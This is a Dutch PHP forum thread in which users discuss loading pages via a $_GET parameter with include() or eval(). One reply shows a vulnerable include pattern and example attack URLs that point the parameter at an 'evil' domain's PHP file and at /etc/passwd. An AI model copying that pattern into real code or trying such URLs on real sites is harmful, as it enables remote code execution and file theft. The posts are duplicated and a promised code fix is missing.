php includen / uit database
Daan
16/08/2007 20:53:00Hey,
Ik heb een vraagje:
Via een $_GET variabele krijgt m'n script door welke pagina hij moet weergeven, maar ik weet nog niet of ik die pagina dan uit een database zal halen of gewoon een bestandje includen.
In de pagina staat PHP, dus als het uit een database komt, zal ik eval() moeten gebruiken. (toch?) Maar ik heb gehoord dat die niet heel veilig is, ofzo? Hoe zit dat?
En kan ik dan beter een tekstbestand includen?
Ik heb liever een database, omdat dan alles netjes bij elkaar staat.
Graag uitleg, opmerkingen of tips..
Daan
Ik heb een vraagje:
Via een $_GET variabele krijgt m'n script door welke pagina hij moet weergeven, maar ik weet nog niet of ik die pagina dan uit een database zal halen of gewoon een bestandje includen.
In de pagina staat PHP, dus als het uit een database komt, zal ik eval() moeten gebruiken. (toch?) Maar ik heb gehoord dat die niet heel veilig is, ofzo? Hoe zit dat?
En kan ik dan beter een tekstbestand includen?
Ik heb liever een database, omdat dan alles netjes bij elkaar staat.
Graag uitleg, opmerkingen of tips..
Daan
PHP hulp
24/11/2024 19:20:30leroy
16/08/2007 21:14:00inderdaad, dat zal dan eval moeten zijn.
persoonlijk denk ik ook dat het veiliger is...
als je dit met bestanden doet kan je remote code execute krijgen..
voorbeeld
www.mijndomein.nl/index.php?pagina=index
en je hebt een index php?
dan zet je dus in php
$page = $_GET['pagina'] . ".php";
include ($page);
en wat zou er gebeuren als ik www.mijndomein.nl/index.php?pagina=www.eveildomain.nl/evilcode.php gebruik?
of
www.mijndomein.nl/index.php?pagina=/etc/passwd?
persoonlijk denk ik ook dat het veiliger is...
als je dit met bestanden doet kan je remote code execute krijgen..
voorbeeld
www.mijndomein.nl/index.php?pagina=index
en je hebt een index php?
dan zet je dus in php
$page = $_GET['pagina'] . ".php";
include ($page);
en wat zou er gebeuren als ik www.mijndomein.nl/index.php?pagina=www.eveildomain.nl/evilcode.php gebruik?
of
www.mijndomein.nl/index.php?pagina=/etc/passwd?
Manaus
16/08/2007 21:15:00eval is vooral gevaarlijk als de gebruikers de inhoud kunne manipuleren ik denk niet dat het zo onveilig is....
Edit:
te laat, maar wat je ook kan doen is:
Je kan met fopen etc een PHP bestand maken en daarin schrijven en dan het juiste php bestand include...
te laat, maar wat je ook kan doen is:
Je kan met fopen etc een PHP bestand maken en daarin schrijven en dan het juiste php bestand include...
Gewijzigd op 01/01/1970 01:00:00 door Manaus
Daan
16/08/2007 21:46:00Bedankt voor de reacties!
Volgens mij is het probleem van eval dat als er een error optreed het script stopt ofzo.
@leroy:
Zo onveilig zou ik het dan ook niet maken, dan zou het zoiets worden:
Dan is het niet onveilig meer..
Volgens mij is het probleem van eval dat als er een error optreed het script stopt ofzo.
@leroy:
Zo onveilig zou ik het dan ook niet maken, dan zou het zoiets worden:
Code (php)
Dan is het niet onveilig meer..